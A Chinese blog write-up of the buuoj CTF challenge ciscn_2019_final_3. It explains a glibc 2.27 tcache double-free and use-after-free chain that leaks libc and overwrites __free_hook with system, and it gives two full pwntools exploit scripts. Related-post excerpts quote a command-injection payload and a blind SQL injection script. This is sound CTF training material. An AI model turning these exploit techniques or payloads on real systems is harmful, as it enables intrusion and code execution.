buuoj刷题记录 - ciscn_2019_final_3

原创 已于 2022-03-25 22:01:28 修改 · 548 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2022-03-25 21:48:32 首次发布
本文详细介绍了通过未释放内存再次释放(UAF)漏洞进行攻击的方法。利用双释放(double free)技巧,修改指针指向特定内存区域,从而实现对程序的控制。文章包括如何通过双释放漏洞修改内存指针,泄露库文件信息,最终获取系统权限。

看了大佬们的思路才做出来的,这里只记录一下做题中踩的坑。

1.add函数
在这里插入图片描述
2.del函数
在这里插入图片描述
free后没有把数组元素标记为0,存在UAF漏洞.
思路是:1.double free 改fd 到 另一个chunk 的首地址处,然后修改chunksize ,原因是程序限制了分配大小为120字节,free到unsorted bin里面。
2.free chunk 到unsorted bin里面
3.double free 修改fd 到第二步中的chunk,之后便可以malloc 到unsorted bin处,然后泄露libc
4.继续利用double free改fd到free_hook,改为system即可。

1.tcache bin的一些注意事项:
与size有关的一些:

		有64个bin	, 每个bin里面最多有7个 chunk
		每个bin 的chunk 大小(向下取整 ,& ~(0xf)):
			0x20,0x30,.........0x400,0x410 
		0x413,0x415...之类的size ,在向下取整对齐后也是属于0x410的
		要想使chunk不进入tcache bin,就要满足:
		对应bin里面已经有7个chunk,或者该chunk 的size >= 0x420	
		还有一点要注意count 数组 是无符号的, 0的时候还可以get一个,但是变成 -1 后就无法put 了.

安全检查:

typedef struct tcache_entry
{
  struct tcache_entry *next;          //只有一个成员,下一个chunk的地址+prev_size + cur_size ,
                                      //2.31新增了 key 用于double free check.
} tcache_entry;

glibc 2.27里面的tcache_entry只有一个next指针,2.31里面还有一个key 用于检查double free.
2.27 没有double free的检查,随便搞就可以了

2.fastbin
默认最大chunk 是0x80 (向下取整对齐后的结果),必须使Chunk 的 size >= 0x90 才能丢到unsorted bin里面.

3.注意free chunk的时候会检查下一个chunk的大小.

exp:

from pwn import*
#sh = process('./pwn')
sh = remote('node4.buuoj.cn',29672)

def add(idx,size,payload):
    sh.sendlineafter(b'2. remove\n',b'1')
    sh.sendlineafter(b'input the index',str(idx).encode())
    sh.sendlineafter(b'input the size',str(size).encode())
    sh.sendlineafter(b'now you can write something',payload)
    sh.recvuntil(b'gift :')
    return int(sh.recvline()[:-1],16)

def free(idx):
    sh.sendlineafter(b'2. remove\n',b'2')
    sh.sendlineafter(b'input the index',str(idx).encode())

#泄露libc
#0x20
add(0,0x10,b'emmm')     #double free.

#0x421

nextchunk = add(1,0x10,'emmm') - 0x10
for i in range(8):
    add(2+i,0x70,'emmm')
#阻止合并到top chunk
add(11,0x10,'emmm')
#
log.success('next chunk %x',nextchunk)

free(0)
free(1)
free(0)
free(1)
#
add(12,0x10,p64(nextchunk))
add(13,0x10,'emm')
add(14,0x10,'emm')
add(15,0x10,p64(0) + p64(0x421))
#
free(1)     #-->unsorted bin

# #
free(11)
free(0)
free(11)
free(0)
free(11)


add(16,0x10,p64(nextchunk + 0x10))
add(17,0x10,'emm')
add(18,0x10,'emm')
add(19,0x10,'emm')


libc_base = add(20,0x10,'\x00') - 0x3ebca0
system = libc_base + 0x4f440
free_hook = libc_base + 0x3ed8e8

log.success('libc_base :%x ',libc_base)

free(0)
free(11)
free(0)
free(11)

add(21,0x10,p64(free_hook))
add(22,0x10,b'/bin/sh')         #22
add(23,0x10,b'emm')
add(24,0x10,p64(system))

#gdb.attach(sh)
sh.interactive()

做这道题的时候我以为tcache bin会检测出连续两个chunk 的double free. 刚才又看了一下源码才发现没有这个检查.

修改了一下exp:

from pwn import*
sh = process('./pwn')
#sh = remote('node4.buuoj.cn',29672)

def add(idx,size,payload):
    sh.sendlineafter(b'2. remove\n',b'1')
    sh.sendlineafter(b'input the index',str(idx).encode())
    sh.sendlineafter(b'input the size',str(size).encode())
    sh.sendlineafter(b'now you can write something',payload)
    sh.recvuntil(b'gift :')
    return int(sh.recvline()[:-1],16)

def free(idx):
    sh.sendlineafter(b'2. remove\n',b'2')
    sh.sendlineafter(b'input the index',str(idx).encode())

#泄露libc
#0x20
add(0,0x10,b'emmm')     #double free.

#0x421

nextchunk = add(1,0x10,'emmm') - 0x10
for i in range(8):
    add(2+i,0x70,'emmm')
#阻止合并到top chunk
add(11,0x10,'emmm')
#
log.success('next chunk %x',nextchunk)

free(0)
free(0)
free(0)
#
add(12,0x10,p64(nextchunk))
add(13,0x10,'emm')
add(14,0x10,p64(0) + p64(0x421))
#
free(1)     #-->unsorted bin

#gdb.attach(sh)

# 修改fd 到unsorted bin
free(0)
free(0)
free(0)
free(0)

#
add(16,0x10,p64(nextchunk + 0x10))
add(17,0x10,'emm')
add(18,0x10,'emm')
libc_base = add(19,0x10,'\x00') - 0x3ebca0
system = libc_base + 0x4f440
free_hook = libc_base + 0x3ed8e8

log.success('libc_base :%x ',libc_base)

#gdb.attach(sh)
free(0)
free(0)
free(0)

add(20,0x10,p64(free_hook))
add(21,0x10,b'/bin/sh')
add(22,0x10,p64(system))

sh.interactive()
【buu题】ciscn_2019_final_3
m0_73756460的博客
03-18 563
【buu题】ciscn_2019_final_3 write up
BUUOJ-Web-题记
x0r
09-01 484
为提升观感体验,本篇博文长期更新,新题目以二次编辑形式附在最后 [ACTF2020 新生赛]Exec 打开后发现网页是关于执行一个ping指令,经过测试是直接执行的,所以就直接命令执行了 127.0.0.1 | cat /flag 总结一下常见的Linux管道符 |按位或,直接执行|后面的语句 ||逻辑或,如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句 &按位与,&a...
【pwn】 ciscn_2019_final_3
Nothing
12-18 1795
例行检查 保护全开,分析程序。 add函数 只能申请小于0x78大小的chunk,chunk数量不能超过24个,且题目给了申请到内存空间的地址。 free函数 free后指针没有置0,且libc是2.27的,存在tcache dup。唯一问题就在于如何得到libc的地址。泄露libc地址一般通过unsortbin,存在tcache的情况下,64位程序需要申请超过0x400大小chunk,fre...
buuoj题记2
臭nana的博客
06-11 352
[GYCTF2020]Ezsqli 首先从题目名字就能知道这是道SQL注入题 打开题目测一下,输入1打印Nu1L,输入2打印V&N,其他的数字是报没有查询结果的错 加个单引号试试,显示bool(false) 布尔盲注 import requests url = "http://0a02ac5a-9801-4b63-a153-6d331955650d.node3.buuoj.cn/index.php" database = "" key='' for i in range(1
buuoj题记 - npuctf_2020_easyheap
qq_34010404的博客
03-26 274
题目给了add,show,edit,del函数 问题在edit函数里面,重新编辑的时候可以溢出一个字节 看一下create函数,只能分配大小为 24,和56的空间 思路:覆盖下一个chunk的chunksize低字节达到修改chunk的大小,free 的时候会放到更大的tcache bin里面,之后malloc的时候会造成chunk重叠. 下面是我的构造方法: 把利用 0 把1中chunk2的size 改掉,改成0x40, (一会malloc的时候用到,注意只能分配大小为 56 和 24 的空间,(8.
[BUUCTF]-PWN:ciscn_2019_final_3解析(tcache dup)
2301_79326813的博客
02-15 627
查看保护RELRO保护为FULL,got表不可修改,只能修改hook表了查看ida这里的大致功能为alloc创建堆块(可填充内容)、free释放堆块(但是不清空指针)值得注意的就是创建堆块大小不可以超过0x78(实际大小会对齐)
[BUUCTF]PWN——ciscn_2019_final_3(tcache dup)
mcmuyanga的博客
03-10 1276
ciscn_2019_final_3 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,提示是堆题 64位ida载入 add() remove() 简单的思路:先合并堆块,合并后的堆块大于tcache的范围,然后free掉即可出现libc,接下来就是堆块重叠malloc一个堆块到libc空间,通过gift得到libc地址,接着tcache attack修改__free_hook拿到shell tcache 第一次接触tcache,根据ctfwiki上的知识点简单总结一
[BUUCTF]PWN——ciscn_2019_final_2
mcmuyanga的博客
03-10 1360
ciscn_2019_final_2 附件 步骤 例行检查,64位程序,保护全开 本地没有flag文件,远程连接一下,经典的堆题的菜单 64位ida载入 init() allocate(),只可以申请0x20或者0x10的chunk delete() show(),show只能调用3次 bye_bye 这道题的关键点在于文件流的知识 dup2 用来复制文件描述符:int dup2 (int oldfd,int newfd) _fileno 是用来规定 fd 所指向的文件流的,i
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 725
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
ciscn_2019_final_3
z1r0的博客
12-29 511
ciscn_2019_final_3 查看保护 uaf。 在add时,会给出data区域的地址,理解为fd就行。 2.27有tcache用unstortdbin来泄露需要有一个size大于0x400的chunk。这里借助double free(dup)和uaf改size。达到条件释放,即可有unstorted bin了。 泄露出libc还是用double free + uaf即可申请到hook。具体2.27下的double free(dup)看z1r0’s blog from pwn import *
buuoj题记 - linkctf_2018.7_babypie
qq_34010404的博客
03-18 520
检查程序保护: 拖进IDA看一下,只有一小段代码,存在溢出漏洞 main函数上面有个后门函数 覆盖ret地址到后门函数即可,由于开启了PIE,和Canary,不能直接溢出 下面这两行代码可以把canary打出来 最后由于后门函数入口地址和返回地址只有低字节不同,所以覆盖掉返回地址的低字节即可.,不需要获取程序基址. exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29231) payload = b'
buuoj题记 - babyfengshui_33c3_2016
qq_34010404的博客
03-16 247
检查程序保护: 拖进IDA看一下,add,show,edit,free 有一个全局的数组,每一个元素是一个地址,执行一个User结构体。 分析一下可以知道User结构体大概是这样子: struct User { char* szUserDescription; char szUserName[124]; } add函数: add函数调用了readDescription函数: 其中存在问题的就位于该函数内,该函数在Update内被会被调用. add函数内需要注意的一个地方,就是readDescrip
buuoj题记 - [极客大挑战 2019]Not Bad
qq_34010404的博客
03-28 459
检查一下保护: 程序很简单,存在栈溢出漏洞,只能溢出16个字节。 只允许orw系统调用. 前八个字节用来jmp rsp ,紧接着加上5个字节近转移 call到buff的开始处执行. 这样就可以往buf里面写gadget来往指定地址处读入shellcode 之后跳转到shellcode把flag读出来 exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29515) context.arch= 'x86_6
buuoj题笔记
q1415500189的博客
01-22 1084
buuoj
ciscn_2019_final_3(tcache)
qq_33590156的博客
08-04 389
漏洞 本题中限制了chunk的申请大小,最大只能0x78,无法直接申请大于0x400的chunk free后指针并没有清零,存在uaf tcache中的chunk被拿出时,不会check size 因为是2.27版本,所以tcache中可以直接进行double free(tcache dup) tcache,这个东西在2.23之后的版本中出现,释放的chunk会优先放到tcache中,而同一size的tache chunk最多只能7个,之后再释放此size的chunk,会放到fastbin或者unsorte
[Buuoj题]ciscn_2019_final_3 tcache attack
zylxixixi的博客
10-09 416
Tcache机制的引入 libc2.26以后引入了一个新的机制tcache,类似于fastbin,每条链上允许有7个chunk,多出的chunk会直接放入相应的fastbin或者Unsortedbin,跟以往不同的是,当用户申请chunk时,会优先寻找tcache中的chunk。 因为该机制的引入,提升了处理的速度,但安全性减低了,例如fastbin attach中的double free(tcache dup),free的时候会检查第一个chunk是否为自己,绕过该机制需要构造a->b->
BUU题记
as you know, nlp is fantasitc!
08-10 558
这个文章的知识点包括 sql注入中的异或盲注、preg_match的绕过(%0a绕过,prce限制)、basename去掉ascii码字符的情况。
linux_pwn(6)--tcache&&double free&&ciscn_2019_final_3
azraelxuemo的博客
03-10 1755
文章目What is tcachepwn题例题检查代码分析add函数delete函数准备框架attack修改大小为unsorted bin范围free成unsorted bin难点,怎么泄露libcdouble free free_hook总结 What is tcache tcache是libc2.26之后引进的一种新机制,类似于fastbin一样的东西,每条链上最多可以有 7 个 chunk,free的时候当tcache满了才放入fastbin,unsorted bin,malloc的时候优先去tca
PP-YOLOE_r_snet_v2_csp_darknet_spp_ufo_final_infer下载
最新发布
07-19
为了下载特定版本的 PP-YOLOE 模型文件 `PP-YOLOE_r_snet_v2_csp_darknet_spp_ufo_final_infer`,可以参考以下方法: ### 使用 PaddleDetection 提供的模型下载功能 PP-YOLOE 是基于 PaddlePaddle 深度学习框架的高效目标检测模型,其模型文件通常托管在百度的模型库中。可以通过 PaddleDetection 项目提供的脚本或工具自动下载预训练模型。 1. **安装 PaddleDetection** 如果尚未安装 PaddleDetection,请克隆官方仓库并切换到对应分支: ```bash git clone https://github.com/PaddlePaddle/PaddleDetection.git cd PaddleDetection ``` 2. **下载模型文件** 使用 `ppdet/utils/download_model.py` 工具手动下载模型文件,或直接运行训练/推理脚本时自动下载。例如: ```bash python ppdet/utils/download_model.py https://paddledet.bj.bcebos.com/models/PP-YOLOE_r_snet_v2_csp_darknet_spp_ufo_final_infer.pdparams ``` 3. **手动下载** 如果希望直接通过浏览器或命令行工具(如 `wget` 或 `curl`)下载,可使用以下链接: ```bash wget https://paddledet.bj.bcebos.com/models/PP-YOLOE_r_snet_v2_csp_darknet_spp_ufo_final_infer.pdparams ``` ### 模型文件说明 - **模型权重文件**:`.pdparams` 文件包含训练好的模型参数,用于推理或继续训练。 - **推理部署文件**:如果需要部署模型,还应下载 `.pdmodel` 和 `.pdiparams` 文件,它们适用于 Paddle Inference 部署。 ### 验证模型完整性 在下载完成后,建议验证模型文件的完整性。可以使用 MD5 或 SHA256 校验和进行验证(如果提供)。 ### 推理示例 以下是一个使用 PaddleDetection 进行推理的简单示例: ```python from ppdet.core.workspace import load_config from ppdet.engine import Trainer import paddle # 加载配置文件 cfg = load_config('configs/ppyolo/PP-YOLOE_r_snet_v2_csp_darknet_spp_ufo_dcn.yml') # 初始化模型 trainer = Trainer(cfg) # 加载本地模型文件 trainer.load_weights('PP-YOLOE_r_snet_v2_csp_darknet_spp_ufo_final_infer.pdparams') # 执行推理 result = trainer.predict(['test_images/000001.jpg']) print(result) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Suspend.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值